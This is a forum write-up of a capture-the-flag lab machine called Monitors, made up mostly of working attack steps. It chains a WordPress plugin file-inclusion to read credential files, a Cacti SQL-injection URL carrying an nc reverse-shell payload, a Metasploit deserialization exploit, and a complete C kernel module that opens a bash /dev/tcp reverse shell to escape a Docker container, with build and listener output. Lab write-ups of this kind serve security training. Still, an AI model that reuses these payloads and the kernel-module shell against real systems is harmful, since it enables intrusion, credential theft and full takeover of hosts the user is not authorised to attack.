TUTORIAL Monitors - WriteUp
by Gh0sTs - April 27, 2021 at 07:13 PM
Monitors Walkthrough

## NMAP ##

└─# nmap -sVC -T4 -Pn -n -p- monitors.htb
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-26 15:07 EEST
Nmap scan report for monitors.htb (10.129.120.70)
Host is up (0.043s latency).
Not shown: 65533 closed ports
PORT  STATE SERVICE VERSION
22/tcp open  ssh    OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|  2048 ba:cc:cd:81:fc:91:55:f3:f6:a9:1f:4e:e8:be:e5:2e (RSA)
|  256 69:43:37:6a:18:09:f5:e7:7a:67:b8:18:11:ea:d7:65 (ECDSA)
|_  256 5d:5e:3f:67:ef:7d:76:23:15:11:4b:53:f8:41:3a:94 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: WordPress 5.5.1
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Welcome to Monitor – Taking hardware monitoring seriously
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.63 seconds



The website's CMS is WordPress. Using WPScan, it's noticed that it's vulnerable to file inclusion.


| [!] 1 vulnerability identified:
|
| [!] Title: WP with Spritz 1.0 - Unauthenticated File Inclusion
|    References:
|      - https://wpscan.com/vulnerability/cdd8b32a-b424-4548-a801-bbacbaad23f8
|      - https://www.exploit-db.com/exploits/44544/



Validating the LFI, we can read the /etc/passwd file.
http://monitors.htb//wp-content/plugins/...etc/passwd


root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
marcus:x:1000:1000:Marcus Haynes:/home/marcus:/bin/bash
Debian-snmp:x:112:115::/var/lib/snmp:/bin/false
mysql:x:109:114:MySQL Server,,,:/nonexistent:/bin/false



A subdomain is found: cacti-admin.monitors.htb, which requires authentication.
Use the admin account of the WP and the password from the wp-config.php file.


curl "http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//var/www/wordpress/wp-config.php" | grep -i pass
  % Total    % Received % Xferd  Average Speed  Time    Time    Time  Current
                                Dload  Upload  Total  Spent    Left  Speed
100  3117  100  3117    0    0  36244      0 --:--:-- --:--:-- --:--:-- 36244
/** MySQL database password */
define( 'DB_PASSWORD', '[email protected]!' );



Cacti has an SQLi vuln (https://www.mageni.net/vulnerability/cac...ows-113708).
Create an NC listener and exploit the vulnerability:

1. http://cacti-admin.monitors.htb/cacti/color.php?action=export&header=false&filter=1%27)+UNION+SELECT+1,username,password,4,5,6,7+from+user_auth;update+settings+set+value=%27rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2%3E%261|nc+10.10.14.x+5555+%3E/tmp/f;%27+where+name=%27path_php_binary%27;--+-

2. http://cacti-admin.monitors.htb/cacti/host.php?action=reindex&host_id=1


Get the rev shell.

## User ##
Checking the content of the file located at `/home/marcus/.backup/backup.sh` uncovers a password: VerticalEdge2020.
SSH into the machine as marcus.


## Priv Esc - Container ##
From note.txt we find out there is a Docker container running.
Using netstat, a local instance of Tomcat is found.



[email protected]:~$ netstat -anotp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address          Foreign Address        State      PID/Program name    Timer
tcp        0      0 127.0.0.1:3306          0.0.0.0:*              LISTEN      -                    off (0.00/0/0)
tcp        0      0 127.0.0.53:53          0.0.0.0:*              LISTEN      -                    off (0.00/0/0)
tcp        0      0 0.0.0.0:22              0.0.0.0:*              LISTEN      -                    off (0.00/0/0)
tcp        0      0 127.0.0.1:8443          0.0.0.0:*              LISTEN      -                    off (0.00/0/0)



Forward the port of the newly found service and check it out.
ssh -L 8443:127.0.0.1:8443 [email protected]

Trying to access it, it seems to be Apache Tomcat 9.0.31.
Found this post saying our Apache instance might be vulnerable: https://www.zerodayinitiative.com/blog/2...usted-data
Found a Metasploit module for it. Realized that setting forceexploit to true is required.


msfconsole -q
use exploit/linux/http/apache_ofbiz_deserialization
set rhosts 127.0.0.1
set lhost 10.10.14.40
set forceexploit true
run



You should now have a meterpreter shell and should be root (in the docker/container).


meterpreter > getuid

Server username: root @ 91a348a40438 (uid=0, gid=0, euid=0, egid=0)



## Container Escape ##

Check the Docker container's capabilities.



meterpreter > shell
capsh --print
Process 160 created.
Channel 1 created.
Current: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+eip
Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
Securebits: 00/0x0/1'b0
secure-noroot: no (unlocked)
secure-no-suid-fixup: no (unlocked)
secure-keep-caps: no (unlocked)
uid=0(root)
gid=0(root)
groups=


Since the container has the cap_sys_module capability, we can insert/remove kernel modules.
The following code invokes a rev shell using the usermode helper API.
For more info you can check: https://blog.pentesteracademy.com/abusin...5c29956edd


#include <linux/kmod.h>
#include <linux/module.h>

MODULE_LICENSE("GPL");
MODULE_AUTHOR("AttackDefense");
MODULE_DESCRIPTION("LKM reverse shell module");
MODULE_VERSION("1.0");

/* Command and environment handed to the usermode helper API. */
static char* argv[] = {"/bin/bash", "-c", "bash -i >& /dev/tcp/10.10.14.71/4444 0>&1", NULL};
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL};

/* Runs on insmod: spawns the helper process and returns once exec succeeds. */
static int __init reverse_shell_init(void) {
    return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}

/* Runs on rmmod. */
static void __exit reverse_shell_exit(void) {
    printk(KERN_INFO "Exiting\n");
}

module_init(reverse_shell_init);
module_exit(reverse_shell_exit);



Create a file named Makefile with the following content:


obj-m += reverse-shell.o

all:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

clean:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean



Transfer the 2 created files to the target machine and compile them there.


cd /root
wget 10.10.14.40/reverse-shell.c
wget 10.10.14.40/Makefile



Use the make command to compile the file.
NOTE: Be careful to keep the makefile's name as Makefile; it's case sensitive. Either that, or edit it in the Makefile file :).


make
make -C /lib/modules/4.15.0-142-generic/build M=/root modules
make[1]: Entering directory '/usr/src/linux-headers-4.15.0-142-generic'
  CC [M]  /root/reverse-shell.o
  Building modules, stage 2.
  MODPOST 1 modules
  CC      /root/reverse-shell.mod.o
make[1]: Leaving directory '/usr/src/linux-headers-4.15.0-142-generic'
  LD [M]  /root/reverse-shell.ko


Create an NC listener and use the command insmod reverse-shell.ko to load the kernel module and get the rev shell.


└─# nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.7] from (UNKNOWN) [10.129.120.228] 43580
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
[email protected]:/# whoami
whoami
root
